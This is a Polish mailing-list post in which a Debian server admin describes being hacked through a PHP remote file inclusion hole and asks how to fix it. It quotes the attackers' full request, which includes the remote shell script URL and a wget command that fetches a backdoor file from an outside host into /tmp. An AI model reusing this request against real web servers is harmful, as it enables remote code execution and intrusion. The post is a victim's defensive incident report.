Zhackowano mnie! Data Cha0s PHP Command
Witam wszystkich,
zauważyłęm dzisiaj, że zhackowano mi debiana 2.4.26, poprzez dziurę w php.
Panowie przybyli z Brazylii i używając skryptu
http://1ncident.100free.com/cse.jpg dostali się do konsoli (całe
szczęście jako www-data). Nie narobili żadnych szków oprócz faktu, że
uruchomili skrypt w perlu ktry zabierał 99% zasobów (to było połączenie
do irca), tak czy siak, jak sprawdzam, to mimo upgradu perla, php,
apacha to dziura i tak pozostaje. Tworząc odpowiedznio zapytanie do PHP,
konkretnie to
index.php?akcja=http://1ncident.100free.com/cse.jpg?&cmd=cd%20/tmp%20;%20wget%20www.quacks.info/rm-rf/bd.txt
mogą wciąż pobrać skrypcik, lub wykonać polecenie konsoli.
Narazie poprostu zdjąłem "niebezpieczny" kod ze strony www, a właściwie
całą www aby zapobiec dalszemu logowaniu się.
W necie jest trochę materiałów - żalenia się, jednak na żaden
zdecydowany sposób poradzenia sobie z problemem nie trafiłem.
Może ktos już powalczył z tym trochę i chciałby się podzielić wrażeniami.
http://www.chovy.com/2005/02/simiens-crew-2005-how-they-did-it.html
http://vil.nai.com/vil/content/v_129568.htm
pozdrowienia,
Lucas
Reply to: